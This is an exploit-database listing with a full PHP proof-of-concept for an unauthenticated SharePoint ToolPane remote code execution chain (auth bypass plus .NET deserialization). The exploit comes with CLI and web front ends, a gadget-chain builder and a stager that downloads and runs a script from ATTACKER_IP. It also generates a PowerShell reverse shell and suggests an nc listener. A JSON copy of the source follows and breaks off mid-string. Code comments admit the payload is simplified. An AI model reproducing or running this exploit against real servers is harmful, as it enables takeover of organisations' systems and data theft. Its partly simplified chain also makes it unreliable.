📄 Microsoft SharePoint Server ToolPane Authentication Bypass / Unsafe Deserialization

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Proof of concept exploit for Microsoft SharePoint server that chains authentication bypass with unsafe deserialization to achieve complete system compromise without authentication...

Visit Original Source

Basic Information

ID PACKETSTORM:212316

Published Dec 2, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Microsoft SharePoint Server ToolPane Authentication Bypass + Unsafe Deserialization |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.microsoft.com/en-us/microsoft-365/sharepoint/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/207935/ & CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771

[+] Summary :

critical unauthenticated remote code execution vulnerabilities in Microsoft SharePoint Server. The vulnerability chain combines authentication bypass vulnerabilities
(CVE-2025-49706 and CVE-2025-53771) with an unsafe deserialization vulnerability (CVE-2025-49704) to achieve complete system compromise without authentication.

[+] Affected Components

# Authentication Bypass Endpoint

POST /_layouts/15/ToolPane.aspx/RANDOM_PATH

# Deserialization Trigger

ExcelDataSet Control with CompressedDataTable

Vulnerability Chain

1. Authentication Bypass via CVE-2025-49706 & CVE-2025-53771
2. Access ToolPane.aspx with arbitrary parameters
3. Trigger unsafe deserialization via CVE-2025-49704
4. Execute .NET gadget chain for code execution
5. Achieve RCE as SharePoint application pool identity

[+] POC : php poc.php

# Vulnerability Scan

php poc.php -t http://sharepoint.company.com`

# Execute Command

php poc.php -t http://sharepoint.company.com -c 'whoami'`

# Create PowerShell Payload

php poc.php --generate -l 192.168.1.100 -r 4444`

Via Browser:

https://yourserver.com/exploit.php

<?php
/**
* Author: indoushka
* Vulnerabilities: Authentication Bypass + Unsafe Deserialization
*/

class SharePointExploit {
private $target;
private $base_path;

public function __construct($target_url, $base_path = '/') {
$this->target = rtrim($target_url, '/');
$this->base_path = rtrim($base_path, '/');
}

public function check_vulnerability() {
echo "[*] Checking SharePoint version and vulnerability...\n";

$url = $this->target . $this->base_path . '/_layouts/15/start.aspx';

$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]
]);

$response = @file_get_contents($url, false, $context);

if ($response === false) {
echo "[-] Could not connect to SharePoint\n";
return false;
}

// Extract siteClientTag from JavaScript
preg_match('/"*siteClientTag"*\s*:\s*"\d*[$]+([^"]+)",/', $response, $matches);

if (!isset($matches[1])) {
echo "[-] Could not determine SharePoint version\n";
return false;
}

$version = $matches[1];
echo "[+] SharePoint version detected: {$version}\n";

// Check if version is vulnerable
$vulnerable_versions = [
'16.0.14326.20450' => '16.0.18526.20424', // SharePoint Subscription Edition
'16.0.10337.12109' => '16.0.10417.20027', // SharePoint 2019
'16.0.4351.1000' => '16.0.5508.1000', // SharePoint 2016
];

foreach ($vulnerable_versions as $min_version => $max_version) {
if (version_compare($version, $min_version, '>=') &&
version_compare($version, $max_version, '<=')) {
echo "[+] Version appears to be VULNERABLE!\n";
return true;
}
}

echo "[-] Version appears to be PATCHED\n";
return false;
}

public function exploit($command = 'whoami') {
echo "[*] Exploiting SharePoint ToolPane vulnerabilities...\n";

// Step 1: Create the gadget chain
$gadget_chain = $this->create_gadget_chain($command);
if (!$gadget_chain) {
echo "[-] Failed to create gadget chain\n";
return false;
}

// Step 2: Send the exploit
$result = $this->send_exploit($gadget_chain);

if ($result) {
echo "[+] Exploit sent successfully\n";
// Note: Command output may not be directly visible
echo "[+] Check your listener for reverse shell\n";
} else {
echo "[-] Exploit failed\n";
}

return $result;
}

private function create_gadget_chain($command) {
echo "[*] Creating .NET deserialization gadget chain...\n";

// For demonstration, we'll create a simple command execution payload
// In a real scenario, this would be a complex .NET deserialization chain

$payload = base64_encode($this->generate_payload($command));

// Create the DataSet wrapper with the payload
$name_a = $this->random_string(8);
$name_b = $this->random_string(8);
$name_c = $this->random_string(8);

$schema = <<<XML
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="{$name_a}">
<xs:element name="{$name_a}" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:element name="{$name_b}">
<xs:complexType>
<xs:sequence>
<xs:element name="{$name_c}" msdata:DataType="System.Collections.Generic.List`1[[System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" type="xs:anyType" minOccurs="0"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:schema>
XML;

$diffgram = <<<XML
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<{$name_a}>
<{$name_b} diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
<{$name_c} xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Deserialize</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{$payload}</anyType>
</MethodParameters>
<ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfLosFormatterObjectDataProvider>
</{$name_c}>
</{$name_b}>
</{$name_a}>
</diffgr:diffgram>
XML;

// Combine into the final gadget chain
$gadget_chain = $schema . $diffgram;

return $gadget_chain;
}

private function generate_payload($command) {
// Generate a simple PowerShell payload
// In a real exploit, this would be a proper .NET deserialization payload

$powershell_cmd = base64_encode("iex (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/payload.ps1')");

$payload = <<<PS
powershell -enc {$powershell_cmd}
PS;

return $payload;
}

private function send_exploit($gadget_chain) {
echo "[*] Sending exploit to ToolPane.aspx...\n";

$random_path = $this->random_string(8);
$random_param = $this->random_string(8);

$namespace_ui = $this->random_string(8);
$namespace_scorecards = $this->random_string(8);

// Compress the gadget chain
$compressed_gadget = gzencode($gadget_chain);
$encoded_gadget = base64_encode($compressed_gadget);

// Create the XML payload
$xml = <<<XML
<%@ Register Tagprefix="{$namespace_ui}" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<%@ Register Tagprefix="{$namespace_scorecards}" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<{$namespace_ui}:UpdateProgress>
<ProgressTemplate>
<{$namespace_scorecards}:ExcelDataSet CompressedDataTable="{$encoded_gadget}" DataTable-CaseSensitive="true" runat="server"/>
</ProgressTemplate>
</{$namespace_ui}:UpdateProgress>
XML;

$url = $this->target . $this->base_path . "/_layouts/15/ToolPane.aspx/{$random_path}";

$post_data = http_build_query([
'MSOTlPn_Uri' => $this->target . $this->base_path . '/_controltemplates/15/AclEditor.ascx',
'MSOTlPn_DWP' => $xml
]);

$get_params = http_build_query([
'DisplayMode' => 'Edit',
$random_param => '/ToolPane.aspx'
]);

$full_url = $url . '?' . $get_params;

$headers = [
'Referer: ' . $this->target . $this->base_path . '/_layouts/SignOut.aspx',
'Content-Type: application/x-www-form-urlencoded',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
];

$context = stream_context_create([
'http' => [
'method' => 'POST',
'header' => implode("\r\n", $headers),
'content' => $post_data,
'timeout' => 15,
'ignore_errors' => true
]
]);

$response = @file_get_contents($full_url, false, $context);

if ($response === false) {
return false;
}

// Check for successful exploitation indicators
if (strpos($response, 'error') === false) {
return true;
}

return false;
}

private function random_string($length = 8) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$result = '';
for ($i = 0; $i < $length; $i++) {
$result .= $characters[rand(0, strlen($characters) - 1)];
}
return $result;
}

public function generate_powershell_payload($lhost, $lport) {
$payload = <<<PS
\$client = New-Object System.Net.Sockets.TCPClient('{$lhost}',{$lport});
\$stream = \$client.GetStream();
[byte[]]\$bytes = 0..65535|%{0};
while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){
\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);
\$sendback = (iex \$data 2>&1 | Out-String );
\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';
\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);
\$stream.Write(\$sendbyte,0,\$sendbyte.Length);
\$stream.Flush();
}
\$client.Close();
PS;

$encoded = base64_encode($payload);
file_put_contents('payload.ps1', $payload);

echo "[+] PowerShell payload created: payload.ps1\n";
echo "[+] Use command: powershell -enc {$encoded}\n";
echo "[+] Start listener: nc -lvnp {$lport}\n";

return $encoded;
}
}

// Command line interface
if (php_sapi_name() === 'cli') {
echo "
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝

SharePoint ToolPane Unauthenticated RCE Exploit
CVE-2025-49706, CVE-2025-53771, CVE-2025-49704
\n";

$options = getopt("t:p:c:l:r:gh", [
"target:",
"path:",
"command:",
"lhost:",
"lport:",
"generate",
"help"
]);

if (isset($options['h']) || isset($options['help']) || $argc == 1) {
echo "Usage: php poc.php [options]\n";
echo "Options:\n";
echo " -t, --target Target URL (required)\n";
echo " -p, --path Base path (default: /)\n";
echo " -c, --command Command to execute\n";
echo " -l, --lhost Listener IP for reverse shell\n";
echo " -r, --lport Listener port for reverse shell\n";
echo " -g, --generate Generate PowerShell payload only\n";
echo " -h, --help Show this help message\n";
echo "\nExamples:\n";
echo " php poc.php -t http://sharepoint.company.com -c 'whoami'\n";
echo " php poc.php -t http://sharepoint.company.com -l 192.168.1.100 -r 4444\n";
echo " php poc.php --generate -l 192.168.1.100 -r 4444\n";
exit(1);
}

if (isset($options['g']) || isset($options['generate'])) {
if (!isset($options['l']) && !isset($options['lhost'])) {
echo "Error: LHOST is required for payload generation\n";
exit(1);
}

$lhost = isset($options['l']) ? $options['l'] : $options['lhost'];
$lport = isset($options['r']) ? $options['r'] : (isset($options['lport']) ? $options['lport'] : 4444);

$exploit = new SharePointExploit('');
$exploit->generate_powershell_payload($lhost, $lport);
exit(0);
}

if (!isset($options['t']) && !isset($options['target'])) {
echo "Error: Target URL is required\n";
exit(1);
}

$target = isset($options['t']) ? $options['t'] : $options['target'];
$path = isset($options['p']) ? $options['p'] : (isset($options['path']) ? $options['path'] : '/');
$command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami');

$exploit = new SharePointExploit($target, $path);

// Check vulnerability first
if (!$exploit->check_vulnerability()) {
echo "[-] Target does not appear to be vulnerable\n";
exit(1);
}

// Execute exploit
$exploit->exploit($command);

} else {
// Web interface
if (isset($_POST['exploit'])) {
$target = $_POST['target'] ?? '';
$path = $_POST['path'] ?? '/';
$command = $_POST['command'] ?? 'whoami';

if ($target) {
$exploit = new SharePointExploit($target, $path);

ob_start();
$exploit->check_vulnerability();
$exploit->exploit($command);
$output = ob_get_clean();

echo "<pre>$output</pre>";
} else {
echo "<div style='color: red;'>Target URL is required</div>";
}
} else {
echo '<!DOCTYPE html>
<html>
<head>
<title>SharePoint RCE Exploit</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.container { max-width: 600px; margin: 0 auto; }
.form-group { margin-bottom: 15px; }
label { display: block; margin-bottom: 5px; font-weight: bold; }
input[type="text"] {
width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px;
}
button {
background: #007cba; color: white; padding: 10px 20px;
border: none; border-radius: 4px; cursor: pointer;
}
</style>
</head>
<body>
<div class="container">
<h1>SharePoint ToolPane RCE Exploit</h1>
<form method="post">
<input type="hidden" name="exploit" value="1">

<div class="form-group">
<label for="target">Target URL:</label>
<input type="text" id="target" name="target" placeholder="http://sharepoint.company.com" required>
</div>

<div class="form-group">
<label for="path">Base Path:</label>
<input type="text" id="path" name="path" value="/">
</div>

<div class="form-group">
<label for="command">Command:</label>
<input type="text" id="command" name="command" value="whoami">
</div>

<button type="submit">Execute Exploit</button>
</form>
</div>
</body>
</html>';
}
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-02T19:41:59",
    "description": "Proof of concept exploit for Microsoft SharePoint server that chains authentication bypass with unsafe deserialization to achieve complete system compromise without authentication...",
    "published": "2025-12-02T00:00:00",
    "modified": "2025-12-02T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass / Unsafe Deserialization",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212316",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-49704",
        "CVE-2025-49706",
        "CVE-2025-53770",
        "CVE-2025-53771"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Microsoft SharePoint Server ToolPane Authentication Bypass + Unsafe Deserialization                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.microsoft.com/en-us/microsoft-365/sharepoint/                                                                   |\n    =============================================================================================================================================\n    \n    POC : \n    \n    [+] References : https://packetstorm.news/files/id/207935/ & \tCVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771\n    \n    [+] Summary : \n              \n               critical unauthenticated remote code execution vulnerabilities in Microsoft SharePoint Server. The vulnerability chain combines authentication bypass vulnerabilities \n    \t\t   (CVE-2025-49706 and CVE-2025-53771) with an unsafe deserialization vulnerability (CVE-2025-49704) to achieve complete system compromise without authentication.\n    \t\t  \n    [+] Affected Components\n    \n    # Authentication Bypass Endpoint\n    \n    POST /_layouts/15/ToolPane.aspx/RANDOM_PATH\n    \n    # Deserialization Trigger\n    \n    ExcelDataSet Control with CompressedDataTable\n    \n    Vulnerability Chain\n    \n    1. Authentication Bypass via CVE-2025-49706 & CVE-2025-53771\n    2. Access ToolPane.aspx with arbitrary parameters\n    3. Trigger unsafe deserialization via CVE-2025-49704\n    4. Execute .NET gadget chain for code execution\n    5. Achieve RCE as SharePoint application pool identity\n    \n    [+]  POC : php poc.php\n    \n    # Vulnerability Scan\n    \n    php poc.php -t http://sharepoint.company.com`\n    \n    # Execute Command\n    \n    php poc.php -t http://sharepoint.company.com -c 'whoami'`\n    \n    # Create PowerShell Payload\n    \n    php poc.php --generate -l 192.168.1.100 -r 4444`\n    \n    Via Browser:\n    \n    https://yourserver.com/exploit.php\n    \n    <?php\n    /**\n     * Author: indoushka\n     * Vulnerabilities: Authentication Bypass + Unsafe Deserialization\n     */\n    \n    class SharePointExploit {\n        private $target;\n        private $base_path;\n        \n        public function __construct($target_url, $base_path = '/') {\n            $this->target = rtrim($target_url, '/');\n            $this->base_path = rtrim($base_path, '/');\n        }\n        \n        public function check_vulnerability() {\n            echo \"[*] Checking SharePoint version and vulnerability...\\n\";\n            \n            $url = $this->target . $this->base_path . '/_layouts/15/start.aspx';\n            \n            $context = stream_context_create([\n                'http' => [\n                    'method' => 'GET',\n                    'timeout' => 10,\n                    'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n                ]\n            ]);\n            \n            $response = @file_get_contents($url, false, $context);\n            \n            if ($response === false) {\n                echo \"[-] Could not connect to SharePoint\\n\";\n                return false;\n            }\n            \n            // Extract siteClientTag from JavaScript\n            preg_match('/\"*siteClientTag\"*\\s*:\\s*\"\\d*[$]+([^\"]+)\",/', $response, $matches);\n            \n            if (!isset($matches[1])) {\n                echo \"[-] Could not determine SharePoint version\\n\";\n                return false;\n            }\n            \n            $version = $matches[1];\n            echo \"[+] SharePoint version detected: {$version}\\n\";\n            \n            // Check if version is vulnerable\n            $vulnerable_versions = [\n                '16.0.14326.20450' => '16.0.18526.20424', // SharePoint Subscription Edition\n                '16.0.10337.12109' => '16.0.10417.20027', // SharePoint 2019\n                '16.0.4351.1000'   => '16.0.5508.1000',   // SharePoint 2016\n            ];\n            \n            foreach ($vulnerable_versions as $min_version => $max_version) {\n                if (version_compare($version, $min_version, '>=') && \n                    version_compare($version, $max_version, '<=')) {\n                    echo \"[+] Version appears to be VULNERABLE!\\n\";\n                    return true;\n                }\n            }\n            \n            echo \"[-] Version appears to be PATCHED\\n\";\n            return false;\n        }\n        \n        public function exploit($command = 'whoami') {\n            echo \"[*] Exploiting SharePoint ToolPane vulnerabilities...\\n\";\n            \n            // Step 1: Create the gadget chain\n            $gadget_chain = $this->create_gadget_chain($command);\n            if (!$gadget_chain) {\n                echo \"[-] Failed to create gadget chain\\n\";\n                return false;\n            }\n            \n            // Step 2: Send the exploit\n            $result = $this->send_exploit($gadget_chain);\n            \n            if ($result) {\n                echo \"[+] Exploit sent successfully\\n\";\n                // Note: Command output may not be directly visible\n                echo \"[+] Check your listener for reverse shell\\n\";\n            } else {\n                echo \"[-] Exploit failed\\n\";\n            }\n            \n            return $result;\n        }\n        \n        private function create_gadget_chain($command) {\n            echo \"[*] Creating .NET deserialization gadget chain...\\n\";\n            \n            // For demonstration, we'll create a simple command execution payload\n            // In a real scenario, this would be a complex .NET deserialization chain\n            \n            $payload = base64_encode($this->generate_payload($command));\n            \n            // Create the DataSet wrapper with the payload\n            $name_a = $this->random_string(8);\n            $name_b = $this->random_string(8);\n            $name_c = $this->random_string(8);\n            \n            $schema = <<<XML\n    <xs:schema xmlns=\"\" xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" xmlns:msdata=\"urn:schemas-microsoft-com:xml-msdata\" id=\"{$name_a}\">\n        <xs:element name=\"{$name_a}\" msdata:IsDataSet=\"true\" msdata:UseCurrentLocale=\"true\">\n            <xs:complexType>\n                <xs:choice minOccurs=\"0\" maxOccurs=\"unbounded\">\n                    <xs:element name=\"{$name_b}\">\n                        <xs:complexType>\n                            <xs:sequence>\n                                <xs:element name=\"{$name_c}\" msdata:DataType=\"System.Collections.Generic.List`1[[System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" type=\"xs:anyType\" minOccurs=\"0\"/>\n                            </xs:sequence>\n                        </xs:complexType>\n                    </xs:element>\n                </xs:choice>\n            </xs:complexType>\n        </xs:element>\n    </xs:schema>\n    XML;\n    \n            $diffgram = <<<XML\n    <diffgr:diffgram xmlns:msdata=\"urn:schemas-microsoft-com:xml-msdata\" xmlns:diffgr=\"urn:schemas-microsoft-com:xml-diffgram-v1\">\n        <{$name_a}>\n            <{$name_b} diffgr:id=\"Table\" msdata:rowOrder=\"0\" diffgr:hasChanges=\"inserted\">\n                <{$name_c} xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n                    <ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n                        <ExpandedElement/>\n                        <ProjectedProperty0>\n                            <MethodName>Deserialize</MethodName>\n                            <MethodParameters>\n                                <anyType xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xsi:type=\"xsd:string\">{$payload}</anyType>\n                            </MethodParameters>\n                            <ObjectInstance xsi:type=\"LosFormatter\"></ObjectInstance>\n                        </ProjectedProperty0>\n                    </ExpandedWrapperOfLosFormatterObjectDataProvider>\n                </{$name_c}>\n            </{$name_b}>\n        </{$name_a}>\n    </diffgr:diffgram>\n    XML;\n    \n            // Combine into the final gadget chain\n            $gadget_chain = $schema . $diffgram;\n            \n            return $gadget_chain;\n        }\n        \n        private function generate_payload($command) {\n            // Generate a simple PowerShell payload\n            // In a real exploit, this would be a proper .NET deserialization payload\n            \n            $powershell_cmd = base64_encode(\"iex (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/payload.ps1')\");\n            \n            $payload = <<<PS\n    powershell -enc {$powershell_cmd}\n    PS;\n            \n            return $payload;\n        }\n        \n        private function send_exploit($gadget_chain) {\n            echo \"[*] Sending exploit to ToolPane.aspx...\\n\";\n            \n            $random_path = $this->random_string(8);\n            $random_param = $this->random_string(8);\n            \n            $namespace_ui = $this->random_string(8);\n            $namespace_scorecards = $this->random_string(8);\n            \n            // Compress the gadget chain\n            $compressed_gadget = gzencode($gadget_chain);\n            $encoded_gadget = base64_encode($compressed_gadget);\n            \n            // Create the XML payload\n            $xml = <<<XML\n    <%@ Register Tagprefix=\"{$namespace_ui}\" Namespace=\"System.Web.UI\" Assembly=\"System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" %>\n    <%@ Register Tagprefix=\"{$namespace_scorecards}\" Namespace=\"Microsoft.PerformancePoint.Scorecards\" Assembly=\"Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\" %>\n        <{$namespace_ui}:UpdateProgress>\n          <ProgressTemplate>\n            <{$namespace_scorecards}:ExcelDataSet CompressedDataTable=\"{$encoded_gadget}\" DataTable-CaseSensitive=\"true\" runat=\"server\"/>\n          </ProgressTemplate>\n        </{$namespace_ui}:UpdateProgress>\n    XML;\n    \n            $url = $this->target . $this->base_path . \"/_layouts/15/ToolPane.aspx/{$random_path}\";\n            \n            $post_data = http_build_query([\n                'MSOTlPn_Uri' => $this->target . $this->base_path . '/_controltemplates/15/AclEditor.ascx',\n                'MSOTlPn_DWP' => $xml\n            ]);\n            \n            $get_params = http_build_query([\n                'DisplayMode' => 'Edit',\n                $random_param => '/ToolPane.aspx'\n            ]);\n            \n            $full_url = $url . '?' . $get_params;\n            \n            $headers = [\n                'Referer: ' . $this->target . $this->base_path . '/_layouts/SignOut.aspx',\n                'Content-Type: application/x-www-form-urlencoded',\n                'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n            ];\n            \n            $context = stream_context_create([\n                'http' => [\n                    'method' => 'POST',\n                    'header' => implode(\"\\r\\n\", $headers),\n                    'content' => $post_data,\n                    'timeout' => 15,\n                    'ignore_errors' => true\n                ]\n            ]);\n            \n            $response = @file_get_contents($full_url, false, $context);\n            \n            if ($response === false) {\n                return false;\n            }\n            \n            // Check for successful exploitation indicators\n            if (strpos($response, 'error') === false) {\n                return true;\n            }\n            \n            return false;\n        }\n        \n        private function random_string($length = 8) {\n            $characters = 'abcdefghijklmnopqrstuvwxyz';\n            $result = '';\n            for ($i = 0; $i < $length; $i++) {\n                $result .= $characters[rand(0, strlen($characters) - 1)];\n            }\n            return $result;\n        }\n        \n        public function generate_powershell_payload($lhost, $lport) {\n            $payload = <<<PS\n    \\$client = New-Object System.Net.Sockets.TCPClient('{$lhost}',{$lport});\n    \\$stream = \\$client.GetStream();\n    [byte[]]\\$bytes = 0..65535|%{0};\n    while((\\$i = \\$stream.Read(\\$bytes, 0, \\$bytes.Length)) -ne 0){\n        \\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\$bytes,0, \\$i);\n        \\$sendback = (iex \\$data 2>&1 | Out-String );\n        \\$sendback2 = \\$sendback + 'PS ' + (pwd).Path + '> ';\n        \\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\$sendback2);\n        \\$stream.Write(\\$sendbyte,0,\\$sendbyte.Length);\n        \\$stream.Flush();\n    }\n    \\$client.Close();\n    PS;\n            \n            $encoded = base64_encode($payload);\n            file_put_contents('payload.ps1', $payload);\n            \n            echo \"[+] PowerShell payload created: payload.ps1\\n\";\n            echo \"[+] Use command: powershell -enc {$encoded}\\n\";\n            echo \"[+] Start listener: nc -lvnp {$lport}\\n\";\n            \n            return $encoded;\n        }\n    }\n    \n    // Command line interface\n    if (php_sapi_name() === 'cli') {\n        echo \"\n    \u2588\u2588\u2557\u2588\u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \n    \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\n    \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588   \u2588\u2554\u255d\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\n    \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\n    \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2557\u2588\u2588\u2551  \u2588\u2588\u2551\n    \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\n        \n        SharePoint ToolPane Unauthenticated RCE Exploit\n        CVE-2025-49706, CVE-2025-53771, CVE-2025-49704\n            \\n\";\n        \n        $options = getopt(\"t:p:c:l:r:gh\", [\n            \"target:\",\n            \"path:\",\n            \"command:\",\n            \"lhost:\",\n            \"lport:\",\n            \"generate\",\n            \"help\"\n        ]);\n        \n        if (isset($options['h']) || isset($options['help']) || $argc == 1) {\n            echo \"Usage: php poc.php [options]\\n\";\n            echo \"Options:\\n\";\n            echo \"  -t, --target        Target URL (required)\\n\";\n            echo \"  -p, --path          Base path (default: /)\\n\";\n            echo \"  -c, --command       Command to execute\\n\";\n            echo \"  -l, --lhost         Listener IP for reverse shell\\n\";\n            echo \"  -r, --lport         Listener port for reverse shell\\n\";\n            echo \"  -g, --generate      Generate PowerShell payload only\\n\";\n            echo \"  -h, --help          Show this help message\\n\";\n            echo \"\\nExamples:\\n\";\n            echo 